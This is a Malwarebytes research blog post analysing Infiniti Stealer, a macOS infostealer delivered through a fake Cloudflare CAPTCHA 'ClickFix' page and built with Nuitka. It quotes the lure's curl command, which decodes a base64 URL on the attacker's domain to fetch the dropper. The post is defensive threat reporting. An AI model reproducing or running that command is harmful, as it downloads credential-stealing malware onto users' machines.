Infiniti Stealer a new macOS infostealer using ClickFix and PythonNuitka Malwarebytes
pActivate subscription ppAdd devices or upgrade ppRenew subscription ppSecure Hub ppDont have an account Sign up pppp ProductsppHave a current computer infectionppWorried its a scamppTry our antivirus with a free fullfeatured 14day trialppGet your free digital security toolkitppFind the right cyberprotection for youpppp Businesspp PricingppProtect your personal devices and datappProtect your teams devices and data no IT skills neededppExplore awardwinning endpoint security for your businesspp Resourcespppp SupportppMalwarebytes and Teams CustomersppNebula and Oneview CustomersppA previously undocumented macOS infostealer has surfaced during our routine threat hunting We initially tracked it as NukeChain but shortly before publication the malwares operator panel became publicly visible revealing its real name Infiniti StealerppThis malware is designed to steal sensitive data from Macs It spreads through a fake CAPTCHA page that tricks users into running a command themselves a technique known as ClickFix Instead of exploiting a bug it relies on social engineeringppThe final payload is written in Python and compiled with Nuitka producing a native macOS binary That makes it harder to analyze and detect than typical Pythonbased malwareppTo our knowledge this is the first documented macOS campaign combining ClickFix delivery with a Nuitkacompiled Python stealerppClickFix doesnt rely on software vulnerabilities Instead it relies on convincing the user to run a command themselves ppA fake verification page instructs the visitor to open Terminal paste a command and press Return Once executed the infection process begins immediately The technique gained popularity on Windows systems but its now being adapted for macOS with the instructions tailored to the platform Command Space open Terminal paste the commandBecause the user runs the command directly many traditional defenses are bypassed Theres no exploit no malicious attachment and no driveby downloadppThe infection begins at updatecheckcom which serves a convincing replica of a Cloudflare human verification pageppThe page instructs the user to paste a verification command into Terminalbash curl sSfL echo aHR0cHM6Ly91cGRhdGUtY2hlY2suY29tL20vN2Q4ZGYyN2Q5NWQ5 base64 decodeppOnce decoded the string resolves to a URL hosted on the same domain that returns the first stage dropper scriptppThe first payload is a Bash script using a template previously observed in macOS stealers such as MacSync also referenced as SHub in earlier research This suggests the use of a shared builderIts responsibilities are straightforwardppThe dropped binary is an Apple Silicon MachO executable 86 MB compiled using Nuitkas onefile modeIts header contains the signature pp4b 41 59 28 b5 2f fdThis corresponds to a KAY header followed by a zstdcompressed archive used by Nuitka to package Python applications ppUnlike PyInstaller Nuitka compiles Python source into C and produces a native binary increasing the complexity of static analysis ppAt runtime the loader decompresses roughly 35 MB of embedded data and launches the final payloadppThe final payload UpdateHelperbin is a Python 311 stealer compiled with NuitkappDespite compilation the binary exposes thousands of named symbols allowing its module structure to be reconstructed during analysisppThe stealer targets a wide range of sensitive datappData is exfiltrated using HTTP POST requestsppBefore beginning data collection the malware checks whether it is running inside known analysis environments includingppIn also introduces a randomized execution delay to evade automated analysis systemsWhen exfiltration completes a function named uploadcomplete sends a Telegram notification to the operator and queues captured credentials for serverside password crackingppThe perception that macOS is a lowrisk malware target continues to fadeppInfiniti Stealer shows how techniques that worked on Windowslike ClickFixare now being adapted to target Mac usersppIt also uses newer techniques like compiling Python into native apps which makes the malware harder to detect and analyze If this approach proves effective we may see more attacks like thisppIf you followed instructions like this or pasted commands into Terminal from a website take action right awayppRemember Do not paste commands into Terminal from websites No legitimate CAPTCHA requires thisppWith thanks to Marcelo Rivero for the binary analysisppWe dont just report on threatswe remove themppCybersecurity risks should never spread beyond a headline Keep threats off your devices by downloading Malwarebytes todayppSHARE THIS ARTICLEpp
Stefan Dasic
ppPassionate about antivirus solutions Stefan has been involved in malware testing and AV product QA from an early age As part of the Malwarebytes team Stefan is dedicated to protecting customers and ensuring their securityppA list of topics we covered in the week of April 13 to April 19 of 2026ppWe sent Tess to investigate a classic Nigerian advancefee scam with a new twist Sadly these old scams are still in play because they workppTake control of pesky permission popups and decide exactly which websites can access your camera microphone location and send you notificationsppYour shipment has arrived email hides remote access softwareppA fake Slack download is giving attackers a hidden desktop on your machineppFake YouTube copyright notices can steal your Google loginppContributorsppThreat CenterppPodcastppGlossaryppScamspp
Malwarebytes allinone cybersecurity protection always by your side ppCOMPUTER SECURITYppMOBILE SECURITYppPRIVACY PROTECTIONppIDENTITY PROTECTIONppLEARN ABOUT CYBERSECURITYppPARTNER WITH MALWAREBYTESppADDRESSppOne Albert Quay2nd FloorCork T12 X8N6Irelandpp2445 Augustine DriveSuite 550Santa Clara CAUSA 95054ppABOUT MALWAREBYTESppWHY USppGET HELPppWant to stay informed on the latest news in cybersecurity Sign up for our newsletter and learn how to protect your computer from threatsppBy submitting this form you consent to Malwarebytes contacting you regarding products and services and using your personal data as described in our Terms of Service and Privacy Policypp
2026 All Rights Reserved p
Stefan Dasic
ppPassionate about antivirus solutions Stefan has been involved in malware testing and AV product QA from an early age As part of the Malwarebytes team Stefan is dedicated to protecting customers and ensuring their securityppA list of topics we covered in the week of April 13 to April 19 of 2026ppWe sent Tess to investigate a classic Nigerian advancefee scam with a new twist Sadly these old scams are still in play because they workppTake control of pesky permission popups and decide exactly which websites can access your camera microphone location and send you notificationsppYour shipment has arrived email hides remote access softwareppA fake Slack download is giving attackers a hidden desktop on your machineppFake YouTube copyright notices can steal your Google loginppContributorsppThreat CenterppPodcastppGlossaryppScamspp
Malwarebytes allinone cybersecurity protection always by your side ppCOMPUTER SECURITYppMOBILE SECURITYppPRIVACY PROTECTIONppIDENTITY PROTECTIONppLEARN ABOUT CYBERSECURITYppPARTNER WITH MALWAREBYTESppADDRESSppOne Albert Quay2nd FloorCork T12 X8N6Irelandpp2445 Augustine DriveSuite 550Santa Clara CAUSA 95054ppABOUT MALWAREBYTESppWHY USppGET HELPppWant to stay informed on the latest news in cybersecurity Sign up for our newsletter and learn how to protect your computer from threatsppBy submitting this form you consent to Malwarebytes contacting you regarding products and services and using your personal data as described in our Terms of Service and Privacy Policypp
2026 All Rights Reserved p
